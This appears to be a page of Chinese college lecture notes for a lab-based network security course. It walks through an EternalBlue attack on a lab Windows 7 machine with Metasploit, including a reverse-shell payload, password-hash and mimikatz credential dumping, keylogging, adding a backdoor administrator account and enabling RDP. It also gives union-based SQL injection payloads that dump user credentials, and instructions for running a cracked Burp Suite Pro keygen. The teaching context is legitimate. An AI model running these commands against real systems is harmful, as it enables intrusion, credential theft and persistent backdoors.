目录

  • 1 §1 项目1 搭建网络安全实训环境
    • 1.1 导入(第1次课)
      • 1.1.1 sqli-labs
        • 1.1.1.1 sqli-labs/Less-11
        • 1.1.1.2 思考
      • 1.1.2 ●项目一 cake
      • 1.1.3 DVWA
        • 1.1.3.1 ■■■dvwa(Windows)靶机渗透测试
      • 1.1.4 ●loginPHP
      • 1.1.5 CMS
      • 1.1.6 OWASP_Broken_Web_Apps
      • 1.1.7 项目二 pikachu
      • 1.1.8 redtiger
      • 1.1.9 DC-3
      • 1.1.10 ●项目三 GET, POST, 靶场夺旗
      • 1.1.11 ■SQL注入小结
    • 1.2 §1.1 靶场:虚拟机CentOS7.8(192.168.112.100)
      • 1.2.1 (1)sqli-labs
      • 1.2.2 (2)DVWA-master
        • 1.2.2.1 参考资料:在CentOS6.5中安装DVWA
        • 1.2.2.2 ■附 安装DVWA-1.9(完整版)
      • 1.2.3 (3)login, loginPHP
      • 1.2.4 (4)Firefox, Hackbar
      • 1.2.5 (5)sqlmap
      • 1.2.6 2022.09.07作业1 “未知攻,焉知防”
      • 1.2.7 2022.09.14作业3“拖库—爆库、爆表、爆字段、爆数据”
      • 1.2.8 Q&A-1(作业批改、辅导答疑)
    • 1.3 §1.2 sqlmap
    • 1.4 ●§1.3 Kali
      • 1.4.1 ●Kali2024.3-vmware
      • 1.4.2 ●Kali中安装Sublime(Python开发环境))
      • 1.4.3 ●●●作业1 “永恒之蓝”漏洞(2024.11.29)
        • 1.4.3.1 【Windows版本和内部版本号】
        • 1.4.3.2 参考资料:内网信息搜集
      • 1.4.4 ●Kali:用docker快速搭建漏洞靶场dvwa
    • 1.5 §1.4 Python
      • 1.5.1 §1.4.1 下载、安装、配置Python的Anaconda3集成开发环境
      • 1.5.2 §1.4.2 使用Jupyter Notebook
      • 1.5.3 §1.4.3 在Kali中安装Anaconda3
      • 1.5.4 §1.4.4 在CentOS7中安装Anaconda3
      • 1.5.5 §1.4.5 在CentOS7中安装PyCharm
      • 1.5.6 §1.4.5 在Windows中安装Sublime
    • 1.6 ●●●§1.5 Burp
      • 1.6.1 Burp安装步骤
      • 1.6.2 2022.09.08作业2 “工欲善其事,必先利其器”
      • 1.6.3 Q&A-2(作业批改、辅导答疑)
    • 1.7 §1.5 Wireshark
    • 1.8 ●●●2022.09.15腾讯会议答疑
    • 1.9 2022.09.22直播作业辅导
    • 1.10 第4周 SQL注入、Burp、Python
      • 1.10.1 (1)在Win7中安装Anaconda3集成开发环境
      • 1.10.2 【课外拓展】在Kali中安装Anaconda3
      • 1.10.3 (2)在Win7中安装Sublime
      • 1.10.4 (3作业5“SQL注入、Burp、Python”
      • 1.10.5 (4)SQLmap
      • 1.10.6 ●(5)课堂作业“cake”
      • 1.10.7 ※(6)SQL注入小结
      • 1.10.8 技能大赛样题
      • 1.10.9 第4周讲课提纲
  • 2 ■实训1 SQL注入(第6周)
    • 2.1 (1)实训任务
      • 2.1.1 Windows版本
    • 2.2 (2)实训步骤
    • 2.3 附件:课程资料(PPT,回放)
  • 3 §2 项目2 Kali和BT5
    • 3.1 §2.1 Kali的安装和配置
    • 3.2 §2.2 Kali的远程SSH登录
    • 3.3 §2.3 BT5的安装和配置及远程SSH登录
    • 3.4 2022.10.20作业6"Kali和BT5"
    • 3.5 §2.4 远程登录和远程桌面
    • 3.6 项目3 Kali中Wireshark抓取Telnet、HTTP明文传输
    • 3.7 ●●●§2.5 导入HTTP(CTF01.GET参数注入)
    • 3.8 测验1 (占期末总评成绩10%)
    • 3.9 GET
    • 3.10 ●§2.5 导入HTTP(CTF02.POST)
      • 3.10.1 2022.11.10靶场
      • 3.10.2 2022.11.17cookie注入
    • 3.11 【选学】§2.5 导入HTTP(CTF03.靶场夺旗)
    • 3.12 项目4 HTTP协议分析
    • 3.13 【课外视野】学习通账号信息泄露分析与安全防御措施
  • 4 ■实训2 网络协议漏洞与利用(第11周)
    • 4.1 实训任务(GNS3)
    • 4.2 ●●●网络协议分析
    • 4.3 ●●●测验2 网络协议分析
    • 4.4 ※※※EVE
      • 4.4.1 (1)实1-310物理机配置
      • 4.4.2 (2)虚拟机Win10配置
      • 4.4.3 (3)实训2 网络协议漏洞与利用
    • 4.5 HTTP Headers
  • 5 实训3 ARP、DHCP、DNS协议安全攻防
    • 5.1 ※※※第13周 ARP协议安全攻防
    • 5.2 (1)ARP协议安全攻防(试题)
    • 5.3 (2)ARP协议安全攻防
    • 5.4 (3)实战 防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 5.5 (4)练习:防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 5.6 ※※※(5)DHCP欺骗、IP欺骗、ARP欺骗的防御
      • 5.6.1 【课外视野】OSPF、生成树、DHCP欺骗和ARP欺骗
    • 5.7 ※※※(6)DNS欺骗
    • 5.8 (7)Port Stealing
    • 5.9 测验3 ARP协议安全攻防
    • 5.10 (参考1 桥接模式)ARP协议安全攻防
    • 5.11 ※(参考2 EVE模拟)ARP协议安全攻防
    • 5.12 第14周末答疑
  • 6 实训4 密码口令渗透
    • 6.1 §4.3 Windows系统口令破解
    • 6.2 §4.4 Linux系统口令破解
    • 6.3 §4.6 无线口令破解
    • 6.4 ※§4.5 网站登录口令破解
    • 6.5 ●●●专题——显错注入+盲注
    • 6.6 ※第15周复习考试
  • 7 §9 实训项目9 暴力破解
    • 7.1 (1)※实战-通过暴力破解Web登录界面获得管理员权限
    • 7.2 (2)字典工具pydictor.py
    • 7.3 (3)hydra和xhydra
    • 7.4 (4)Medusa
    • 7.5 (5)离线破解md5值和shadow加密文件
    • 7.6 (6)Brute Force(DVWA)
    • 7.7 (7)Burp Suite(Windows)
    • 7.8 (8)Burp Suite(Kali)
  • 8 §3 项目3 安装和配置Kali渗透测试系统
    • 8.1 (1)安装Kali渗透测试系统
    • 8.2 (2)SSH连接Kali
    • 8.3 (3)※ettercap抓取FTP登录账号和密码
    • 8.4 (4)结果截图(ettercap抓取FTP登录账号和密码)
  • 9 §5 项目2.3 安装Kali渗透测试系统
    • 9.1 BT到Kali的发展史
    • 9.2 (1)安装Kali
    • 9.3 (2)安装BT5
    • 9.4 ■附 安装Kali、BT5、DVWA、SQLmap、Win7
  • 10 §4 项目4 使用永恒之蓝漏洞对Win7进行渗透
    • 10.1 (1)获取Win7系统shell、开启远程桌面
    • 10.2 (2)截图
    • 10.3 (3)Metasploit渗透测试
    • 10.4 (4)使用msf渗透攻击XP并进行远程关机
    • 10.5 (5)使用msf攻击Win10
    • 10.6 (6)附件:Windows版本
  • 11 ※§3 项目1.2 SQL注入
    • 11.1 ■(1)SQL注入联合查询(第3次课)
      • 11.1.1 附件:联合查询SQL注入模板
      • 11.1.2 ■联合查询SQL注入模板(简版)
    • 11.2 (2)SQL注入(PDF文档)
      • 11.2.1 ①更新Kali系统中的Firefox浏览器并安装浏览器插件
      • 11.2.2 ②部署sqli-labs学习环境
      • 11.2.3 ③)sqli-labs使用教学
      • 11.2.4 ④实战:SQL注入联合查询-获取数据库数据
    • 11.3 ■(3)部署loginPHP网站
      • 11.3.1 ●SQL注入测试
      • 11.3.2 ●创建数据库、部署简单登录网站loginPHP、进行SQL注入测试(2019.12.17)
      • 11.3.3 ①login.php
      • 11.3.4 ②loginAuth.php
      • 11.3.5 ③loginAuth1.php
      • 11.3.6 ④success.php
      • 11.3.7 ⑤failure.php
      • 11.3.8 ■⑥(loginPHP网站SQL注入)结果截图
    • 11.4 (4)DVWA-Low-SQL Injection
    • 11.5 (5)猫舍靶场联合查询SQL注入
    • 11.6 (6)Access数据库
    • 11.7 (7)MySQL数据库的远程登录
  • 12 §3 项目1.3 通过SQLmap进行SQL注入并获得后台管理员账号和密码
    • 12.1 (1)安装SQLmap
    • 12.2 (2)※实战 SQLmap探测DVWA的SQL注入漏洞
    • 12.3 (3)结果截图(SQLmap拖库)
    • 12.4 (4)使用BurpSuite进行POST方式的SQL注入
  • 13 §2 项目1.4 防止黑客攻破Discuz论坛并拿下数据库
    • 13.1 ●实训5 防止黑客攻破Discuz论坛并拿下数据库
    • 13.2 (1)防止黑客攻破Discuz论坛并拿下数据库
    • 13.3 (2)CentOS6.5-desktop及MySQL
  • 14 §8 项目2.4 作业 Wireshark抓取Telnet明文包
    • 14.1 (1)※Wireshark抓取Telnet明文包(CentOS6.5)
    • 14.2 (2)结果截图(Wireshark抓取Telnet明文包)
    • 14.3 (3)常用协议分析(ARP、ICMP、TCP、HTTP、DNS)
  • 15 ●●●§11 实训项目11 基于文件上传漏洞获得网站shell权限
    • 15.1 ●文件上传(PDF文档)
    • 15.2 (1)基于文件上传漏洞获得网站shell权限
    • 15.3 (2)本地文件包含漏洞截图
    • 15.4 (3)课程资料
    • 15.5 (4)课外拓展 编辑器KindEditor文件上传漏洞
  • 16 §12 实训项目12 Nmap
    • 16.1 (1)安全工具
    • 16.2 (2)Nmap
    • 16.3 (3)网络空间安全(系统渗透测试篇)
    • 16.4 (4)信息收集
  • 17 §13 实训项目13 File Inclusion文件包含漏洞及防御
    • 17.1 (1)本地文件包含
    • 17.2 (2)远程文件包含
  • 18 §14 实训项目14 XSS跨站脚本攻击
    • 18.1 (1)窃取用户Cookie信息保存到远程服务器
    • 18.2 (2)反射型XSS攻击劫持用户浏览器
    • 18.3 (3)存储型XSS窃取用户信息
  • 19 DDoS
    • 19.1 (1)DDoS攻击原理
  • 20 §15 实训项目15 缓冲区溢出漏洞
  • 21 §16 实训项目16 搭建蜜罐系统捕捉黑客操作步骤
  • 22 §15 网络协议分析
    • 22.1 (1)HTTP协议
    • 22.2 (2)Burp
    • 22.3 (3)Wireshark
    • 22.4 (4)Fiddler
  • 23 考核
    • 23.1 平时成绩(40%+30%)
    • 23.2 期末考试(30%)
  • 24 网络1901-04期末考试(2020-2021-2)
    • 24.1 试题1:damicms
    • 24.2 试题2:sqli-labs
    • 24.3 试题3:dvwa
    • 24.4 试题4:loginPHP
  • 25 校外卷重修-B05123网络安全运行与维护(2023年春)复习
    • 25.1 (1)loginPHP
    • 25.2 (2)实战-Web安全之SQL注入
    • 25.3 (2)Python编程
    • 25.4 (3)SQLmap或Python编程
  • 26 ●●●复习考试(2024年秋)
    • 26.1 复习
    • 26.2 模拟考试
    • 26.3 考试
2022.09.22直播作业辅导

作业辅导:Burp,SQL注入,Kali,Python,Wireshark

(6)2022.09.22第3-4节课电脑学习通“直播”回放:



2022.09.22直播作业辅导教案:

https://mooc1-api.chaoxing.com/nodedetailcontroller/visitnodedetail?courseId=205573442&knowledgeId=660484741


本节主要内容:

作业4 永恒之蓝

作业3 SQL注入

作业2 Burp

作业1 搭建靶机CentOS7.8


一、《网络安全》基础

1.《计算机网络技术》

(1)IP地址、子网划分、VLSM、CIDR

112网段:192.168.112.0/24

①C类:192.168.112.0/24,首字节192∈[192,224),C类,默认的子网掩码/24,网络地址192.168.112.0

②网络地址:192.168.112.0,子网掩码:255.255.255.0即/24

③广播地址:192.168.112.255

④IP地址范围:192.168.112.1192.168.112.254,介于网络地址和广播地址之间

IP地址数:=254个(主机号:1254)

子网划分:对192.168.112.0/24网段进行子网划分

借i(1~6)位,剩8-i(7~2)位:产生个子网,每个子网-2个IP

例如:借2位,剩6位:产生个子网,每个子网-2=62个IP

VLSM:/26、/30等

CIDR:C类私有地址:192.168.0.0/24~192.168.255.0/24,256个网段,可以构成超网192.168.0.0/16,16<24,再子网划分

(2)Windows命令提示符下的

 ①网络命令

  IPCONFIG

  PING,ARP,ROUTE,TRACERT     网络层

  NETSTAT,NBTSTAT                        传输层

  NET,NSLOOKUP,HOSTNAME,NETSH /?   应用层

 ②DOS命令

  目录:DIR,PATH,MD,CD,RD,PROMPT

  文件:TYPE,COPY,REN,DEL

  磁盘:FDISK,FORMAT

  其它:CLS,VER,DATE,TIME

(3)TCP/IP网络通信的封装和解封——

A层:HTTP头                          应用层Message

T层:TCP头   或   UDP头         TCP报文段Segment

N层:IP头                               IP分组包Packet或IP数据报Datagram

DL层:Ethernet-II(MAC)帧头  以太帧Frame

P层:D数据→D信号                比特Bit,电信号

Wireshark抓包,网络协议分析


2.《R&S》

交换机的配置与管理:VLAN,STP(MSTP),VRRP,DHCP,端口安全

路由器的配置与管理:静态路由,动态路由(RIP,OSPF,BGP......),NAT,ACL,IP Sec VPN

设备安全:VLAN,交换机端口安全,ACL,VPN,防火墙,无线


3.《OS》——Windows,Linux

Linux,Windows Server

https,安全策略,防火墙

Linux:网络配置、yum源(apt源)、vi/vim编辑器、基本命令、服务、PHP、Python、LAMP(Linux+Apache+MySQL+PHP)环境

操作系统安全:root密码暴力破解,https,iptables,……


4.《数据库技术及应用》

MySQL,SQL Server,Access,VFP,Oracle,......

SQL语言(MySQL):

  DDL(数据定义语言):CREATE,ALTER,DROP

  DML(数据操纵语言):SELECT,INSERT,DELETE,UPDATE

  DCL(数据控制语言):GRANT,REVOKE,DENY,COMMIT,ROLLBACK

show databases;

create database mydb;

use mydb;

create table users(id int(11) primary key,username varchar(8),password varchar(8));

show tables;

desc users;

insert into users values(1,"1","1");

insert into users values(2,"2","2");

insert into users values(3,"wl190514","7df2cac4872");

select * from users;

select * from users where id='1';

select * from users where id='1' order by 3--+;

select * from users where id='1' union select 1,2,3--+;

select * from users where id='1' union select 1,database(),version()--+;   #爆库

以上MySQL:

  show 库s/表s,use 库,desc 表

  DDL:create

  DML:select,insert


数据库安全

SQL注入:联合查询SQL注入,报错型SQL注入,盲注


5.《HTML5+CSS3+JavaScript》

Web前端技术

表单:

<form action="loginAuth.php"或""  method="get"或"post">

    <input type="text" name="username" placeholder="Username" required autofocus>

    <input type="password" name="password" placeholder="Password" required>

    <input type="submit" value="Submit">

</form>

......

bp.php  get

login      get

loginPHP  get


6.《PHP》

连接数据库

SQL查询

LAMP

CMS

黑魔法,序列化,正则表达式

Web安全


7.《Python》

8.《Java》

9.《密码学》

......


湖北省职业院校技能大赛“计算机网络与信息安全技术”赛项:

IP地址规划

R&S,防火墙,无线

Linux

Windows Server

云计算

网络安全


二、靶机

1.CentOS7.8(192.168.112.100)

2.Windows7(永恒之蓝)(192.168.112.101)

Windows XP(192.168.112.102)

Windows Server 2008(192.168.112.103)

建议学习路线:bp.php→login→loginPHP→sqli-labs→DVWA→CMS→网站

                        Burp                   SQL注入

                        Kali:Linux、Win7

                        HTTP   ARP   文件上传、文件包含、XSS、CSRF

                        Wireshark

                        Python

虚拟机“Windows7(永恒之蓝)(192.168.112.101)”的网络设置:



激活:



三、攻击机

kali-2021.1-vmware(kali/kali,192.168.112.200)

Python


四、暴力破解

1.Burp

2.SQL注入

3.Kali

4.Wireshark

5.Python


Burp,SQL注入,Python:应用系统(Web安全)的暴力破解

Kali:metasploit:操作系统(OS安全)的渗透


Wireshark捕获

Burp抓包、改包、放包

ettercap捕获


bp.php,login   Burp+字典,Python

loginPHP         SQL注入,Python

sqli-labs          SQL注入,Python

DVWA:Brute Force,SQL Injection,SQL Injection (Blind):Burp暴力破解,SQL注入,盲注,Python

CMS                Burp+字典,Python


五、Burp

Burp的安装步骤:

(1)如果你初次安装使用Burp

①安装JDK8

②用Burp1.7.37,激活

③安装JDK11

④启动Burp2022.3.7

(2)如果你已安装了JDK8JDK11

①卸载JDK11,保留JDK8
②用Burp1.7.37,激活
③安装JDK11
④启动Burp2022.3.7

或:

①卸载JDK11JDK8

②安装JDK8

③用Burp1.7.37,激活

④安装JDK11

⑤启动Burp2022.3.7

(3)如果你安装了JDK8,没有安装JDK11

①用Burp1.7.37,激活

②安装JDK11
③启动Burp2022.3.7


Burp的使用:

●使用Burp2022.3.7:直接双击“burp_suite_pro_v2022.3.7\英文版启动-BurpSuiteLoader.bat”

●使用Burp1.7.37

将Burp_Suite_Pro_v1.7.37_Loader_Keygen文件夹的“burp-loader-keygen.jar ”和“burpsuite_pro_v1.7.37.jar”文件复制到“C:\Program Files (x86)\Common Files\Oracle\Java\javapath”文件夹,在地址栏输入“CMD”,进入Windows命令提示符C:\Program Files (x86)\Common Files\Oracle\Java\javapath> 

输入:java -jar <Tab>


进入Burp1.7.37


思考:你能设置成直接双击启动Burp1.7.37吗?


六、Kali-burpsuite

Kali中的burpsuite Community Edition社区版

抓包、改包、放包


七、Kali-metasploit


准备:

用Xshell远程SSH登录Kali

$ ping www.baidu.com  #通!可以访问外网

$ ping 192.168.112.101  #通!可以访问Win7

启动:

$ msfconsole

         =[ metasploit v6.0.40-dev                                  ]

+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]

+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]

+ -- --=[ 8 evasion                                                        ]

1.扫描

msf6 > search ms17_010

msf6 > use auxiliary/scanner/smb/smb_ms17_010   #或use 4

msf6 auxiliary(scanner/smb/smb_ms17_010)> info

msf6 auxiliary(scanner/smb/smb_ms17_010)> options

msf6 auxiliary(scanner/smb/smb_ms17_010)> set RHOSTS 192.168.112.101

msf6 auxiliary(scanner/smb/smb_ms17_010)> exploit

2.攻击

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf6 exploit(windows/smb/ms17_010_eternalblue)> set RHOSTS 192.168.112.101

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.112.200

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

3.后渗透工具meterpreter

(1)当前meterpreter操作在后台运行(返回exploit模块,再次进入meterpreter)

meterpreter> background

msf6 exploit(windows/smb/ms17_010_eternalblue) > db_nmap 192.168.112.101 -p 445 -v

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions 1

meterpreter> 

(2)获取信息

meterpreter> getuid                  #查看用户权限:system权限

meterpreter> sysinfo

meterpreter> hashdump            #获取账户的hash密码

最后的MD5码用somd5.com解密,若不能解密:

meterpreter> load mimikatz

meterpreter> ?

meterpreter> creds-wdigest

meterpreter> creds-all

(3)键盘记录

meterpreter> ps           #查看explorer.exe进程ID(PID)1088

meterpreter> migrate 1088

meterpreter> keyscan_start

在Win7上键盘输入

meterpreter> keyscan_dump

(4)上传文件、执行文件、获取屏幕截图

meterpreter> upload 文件名                  #上传文件

meterpreter> execute -f notepad.exe    #执行文件

meterpreter> screenshot                        #获取屏幕截图

(5)获取Win7系统shell

meterpreter> shell

C:\Windows\system32>

若乱码,在Xshell中改编码UTF-8为GBK

(6)DOS命令

C:\Windows\system32> CD \

C:\> whoami

C:\> net user

C:\> net user hacker hacker /add        #创建用户hacker,密码hacker

C:\> net localgroup administrators hacker /add  #用户hacker添加到系统管理组

C:\> net localgroup "Remote Desktop Users" hacker /add  #用户hacker添加到远程桌面组

(6)开放3389端口(RDP)

meterpreter> run post/windows/manage/enable_rdp

meterpreter> run post/windows/manage/enable_rdp USERNAME=lch PASSWORD=123456       #创建远程登录用户lch,密码123456

或通过post模块开放3389端口:

meterpreter> background

msf6 exploit(windows/smb/ms17_010_eternalblue)> search enable_rdp

msf6 exploit(windows/smb/ms17_010_eternalblue)> use 0

msf6 post(windows/manage/enable_rdp)> set session 1

msf6 post(windows/manage/enable_rdp)> run

msf6 post(windows/manage/enable_rdp)> db_nmap 192.168.112.101-p 3389

msf6 post(windows/manage/enable_rdp)> sessions 1

meterpreter>


4.远程桌面

$ rdesktop 192.168.112.101


注:

(1)/usr/share/metasploit-framework/data/wordlists/目录下有很多字典!

(2)msf6 > search 0708

auxiliary/scanner/rdp/cve_2019_0708_bluekeep

exploit/windows/rdp/cve_2019_0708_bluekeep_rce


2022.09.22

==================================

第4周 2022.09.28


八、Python

Anaconda3的安装

Jupyter Notebook介绍

Kali中的Python和Python3

(详见下节)


九、sqli-labs

Less-1,Less-2,......

Less-1联合查询SQL注入模板:

(1)?id=1            #注入点

1.判断字符型/数字型

(2)

?id=1 and 1=1       #正常

?id=1 and 1=2       #无显示或报错,说明是数字型;正常,可能为字符型

?id=1'

?id=1'                     #报错,说明单引号没有过滤,存在SQL注入漏洞

?id=1\                    #报错,说明单引号闭合

?id=1\--+               #正常

?id=1'--+               #正常,说明是字符型,单引号闭合

?id=1"--+               #正常,说明是字符型,双引号闭合


2.猜解字段数(二分法)


(3)?id=1' order by 3--+    #显示  说明至少3个字段

    ?id=1' order by 4--+     #报错  说明3个字段

(4)爆出字段的显示位置(回显位)

?id=-1' union select 1,2,3--+     #回显位


3.爆库

(5)获取数据库名称

?id=-1' union select 1,database(),3--+

#显示数据库名:security

4.爆表

(6)列出当前数据库中所有表的名称

?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+

#当前数据库:security,表名:emails,referers,uagents,users

5.爆字段

(7)获取users表中的字段名

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'--+

#数据库security、表users的字段名:id,username,password


得到:

数据库:security

表:users

字段:id,username,password

6.爆数据

(8)获取users表中的用户名、密码字段中的值

?id=-1' union select 1,database(),group_concat(username,0x3a,password,0x3c,0x68,0x72,0x2f,0x3e) from users--+

?id=-1' union select 1,database(),group_concat(username,0x3a,password,0x3c,0x68,0x72,0x2f,0x3e) from users--+

#用户名:密码:

Dumb:Dumb

......

,admin4:admin4

(详见下节)


十、DVWA

1.Low

Brute Force

SQL Injection

SQL Injection (Blind)

2.Medium

Brute Force

SQL Injection

SQL Injection (Blind)

3.High

Brute Force

SQL Injection

SQL Injection (Blind)

4.Impossible

Brute Force

SQL Injection

SQL Injection (Blind)

(详见下节)